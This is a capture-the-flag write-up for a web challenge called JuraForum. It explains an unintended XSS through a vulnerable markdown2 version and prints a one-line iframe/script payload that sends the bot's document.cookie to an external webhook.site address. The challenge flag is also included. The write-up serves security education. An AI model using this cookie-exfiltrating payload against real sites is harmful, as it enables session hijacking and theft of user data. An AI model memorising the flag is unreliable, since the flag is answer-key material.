Difficulty
hard
Categories
web
Description

The Swiss Jurassic Research Institute just launched JuraForum, an internal discussion board for paleontologists to share findings from the Jura mountains.

Can you dig up something they didn’t expect? RAWWWR!

Author
0x90
Attachments
juraforum.tar.gz
Service
Challenge has a remote instance.

Solution (unintended)

The challenge uses the markdown2 library, which had a CVE one week before the challenge was released. The challenge used a vulnerable version, so XSS was trivial:

I used the following payload as a post message to get the flag from the bot:

<iframe
<http:> srcdoc="<script>navigator.sendBeacon('https://webhook.site/00000000-c25d-40e9-9ee4-207b12345357', document.cookie)</script>" a=

Reporting that post gives the flag.

Flag:

dach2026{run_f0r_y0ur_l1f3_7r3x_15_c0m1n6_71310153_ab45aee93826}